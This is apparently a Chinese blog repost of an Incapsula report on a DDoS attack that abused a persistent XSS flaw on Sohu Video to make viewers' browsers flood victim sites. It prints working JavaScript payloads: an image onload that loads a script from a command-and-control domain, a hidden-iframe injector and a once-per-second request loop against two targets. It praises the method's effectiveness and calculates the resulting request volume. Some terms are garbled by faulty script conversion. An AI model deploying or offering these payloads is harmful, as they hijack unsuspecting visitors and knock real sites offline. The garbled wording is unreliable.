xss又叫css (cross site script)
,跨站腳本攻擊。惡意攻擊者往web頁面裡插入惡意html代碼,當使用者浏覽該頁之時,嵌入其中web裡面的html代碼會被執行,進而達到惡意攻擊使用者的特殊目的。
from:http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html
incapsula發現其一個客戶遭受了應用層的ddos攻擊。
大概有22000的網際網路使用者對其網站發起了2000萬的get請求。
該攻擊是利用的一個持久性xss,通過找到一個通路量很大網站的xss,在其網站上插入一段js代碼,當其使用者通路網站之後,就可以利用該網站的使用者對其受害者發起攻擊。
幾種示例代碼:
<code>// javascript injection in <img> tag enabled by persistent xss <img src="/imagename.jpg" onload="$.getscript(‘http://c&cdomain.com/index.html‘)" /> // malicious javascript opens hidden <iframe> function ddos(url) { $("body").append("<iframe id=‘ifr11323‘ style=‘display:none;‘ src=‘http://c&cdomain.com/index.html‘></iframe>"); } // ajax ddos tool in executes get request every second <html><body> <h1>iframe</h1> <script> ddos(‘http://www.target1.com/1.jpg‘, ‘http://www.target2.com/1.jpg‘); function ddos(url,url2){ window.setinterval(function (){ $.getscript(url); $.getscript(url2); },1000) } </script> </body></html></code>
這種攻擊方式在找到通路量巨大的視訊網站的xss之後,非常好用,因為一般的視訊時間不短,這樣通路者在通路視訊網站觀看視訊的時間段内,就不知不覺的成為攻擊者的工具對其受害者網站不斷的發送請求。
此次被利用的是sohu視訊,全球網站流量排名27,可在視訊區域插入xss代碼,控制觀看該視訊的使用者對受害者不斷的發送請求。
注:攻擊的效果就是每秒都請求一次url和url2指定的連接配接,如果一段視訊30分鐘,那麼每個使用者都能在看視訊這段時間内向兩個目标分别發出 1800 次無意義的攻擊請求(如cc),如果是成千上萬的人看個熱門視訊的話。。。